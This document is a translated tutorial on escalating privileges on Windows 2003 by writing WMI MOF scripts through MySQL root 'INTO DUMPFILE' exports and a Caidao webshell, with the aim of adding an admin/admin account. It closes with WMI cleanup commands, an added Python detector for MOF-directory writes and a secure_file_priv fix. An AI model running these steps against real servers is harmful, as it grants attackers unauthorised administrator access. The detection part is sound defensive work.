1. Test environment

win2003 + phpnow

2. Preconditions

mysql + root privileges

3. Tools

(1) Tool 1: the MOF privilege-escalation script (the actual MOF script has been uploaded to the netdisk)

(2) Tool 2: Caidao (菜刀) (file management + database management)

4. How the escalation works

Upload the MOF escalation script to the default MOF auto-load directory (path: c:/windows/system32/wbem/mof). At a fixed moment within every minute the system runs the MOF script files in that directory; the experimental script below runs at the 5th second of every minute.

5. Implementation

5.1 Method 1: use Caidao's database-management feature directly to run a SQL export, writing the MOF file as ASCII into the MOF directory

(Reference: http://www.cnblogs.com/cnsanshao/p/5546872.html)

(1) Step 1: export the "add user" MOF script (admin/admin)

select char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into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

(2) Step 2: export the MOF script that adds the ordinary user to the administrators group

select char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into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

5.2 Method 2: low-privilege webshell upload + MySQL root file-export privileges, to get the MOF files into the MOF auto-load directory

(1) Step 1: with a low-privilege webshell, upload the two MOF escalation scripts directly to a directory the webshell can write to (here the writable directory is assumed to be c:/)

Note: just use Caidao's file-management feature to upload the MOF escalation scripts.

(2) Step 2: using MySQL root's ability to write files to any directory, export the already-uploaded MOF files into the MOF auto-load directory

mysql> select load_file('c:/admin.mof') into dumpfile 'c:/windows/system32/wbem/mof/admin.mof';

Note: it is recommended to wait 2 minutes before exporting the second MOF script (the one that adds the user to the group).

mysql> select load_file('c:/admins.mof') into dumpfile 'c:/windows/system32/wbem/mof/admins.mof';

5.3 Method 3: if you have root access to phpMyAdmin directly, you can run the SQL there to export the ASCII-format MOF file

For the statements, see 5.1

6. Cleanup after escalation

With the MOF script left in place as uploaded, it will keep adding the user at the 5th second of every minute. To stop this, proceed as follows:

First: net stop winmgmt to stop the service

Second: delete the folder: rd /s/q C:\WINDOWS\system32\wbem\Repository

Third: net start winmgmt to start the service
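As an added defender-side example (not from the original post): a small Python detector that flags file-creation events landing in the MOF auto-load directory from sections 4 and 5, rating a write by the MySQL server process as high. The event line format is constructed, loosely modelled on Sysmon FileCreate (Event ID 11) fields; the path normalisation matters because MySQL accepts forward slashes while Windows logs record backslashes.

```python
from dataclasses import dataclass

# Auto-load directory abused by the post (WMI compiles .mof files dropped here),
# kept lower-case with backslashes. Logged paths are normalised the same way:
# MySQL accepts 'c:/windows/...' while Windows events record 'C:\WINDOWS\...'.
MOF_AUTOLOAD_DIR = r"c:\windows\system32\wbem\mof"
# A database server writing into that directory is the signature of
# SELECT ... INTO DUMPFILE abuse; any other writer still deserves a look.
DB_SERVER_IMAGES = {"mysqld.exe", "mysqld-nt.exe"}

@dataclass
class Alert:
    image: str     # process that created the file
    target: str    # normalised path of the created file
    severity: str  # "high" for a DB server process, "medium" otherwise

def normalise_path(path):
    return path.replace("/", "\\").lower()

def parse_event(line):
    """Parse one flattened 'Key: Value | Key: Value' line (constructed format)."""
    fields = {}
    for part in line.split("|"):
        key, sep, value = part.strip().partition(": ")
        if sep:
            fields[key] = value.strip()
    return fields

def check_file_create(line):
    """Return an Alert when a file-creation event (ID 11) lands in the MOF dir."""
    ev = parse_event(line)
    if ev.get("EventID") != "11":
        return None
    target = normalise_path(ev.get("TargetFilename", ""))
    if not target.startswith(MOF_AUTOLOAD_DIR + "\\"):
        return None
    image = normalise_path(ev.get("Image", "")).rsplit("\\", 1)[-1]
    severity = "high" if image in DB_SERVER_IMAGES else "medium"
    return Alert(image, target, severity)

def scan(lines):
    return [a for a in map(check_file_create, lines) if a is not None]

# Constructed sample telemetry, loosely modelled on Sysmon Event ID 11 fields.
SAMPLE_EVENTS = [
    "EventID: 11 | Image: C:\\Program Files\\MySQL\\bin\\mysqld.exe | TargetFilename: c:/windows/system32/wbem/mof/nullevt.mof",
    "EventID: 11 | Image: C:\\WINDOWS\\system32\\notepad.exe | TargetFilename: C:\\WINDOWS\\system32\\wbem\\mof\\test.mof",
    "EventID: 11 | Image: C:\\Program Files\\MySQL\\bin\\mysqld.exe | TargetFilename: C:\\inetpub\\wwwroot\\upload.txt",
    "EventID: 1 | Image: C:\\WINDOWS\\system32\\net.exe | CommandLine: net stop winmgmt",
]
```

Setting MySQL's secure_file_priv to a dedicated directory removes the arbitrary-path INTO DUMPFILE write that every method in section 5 depends on.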
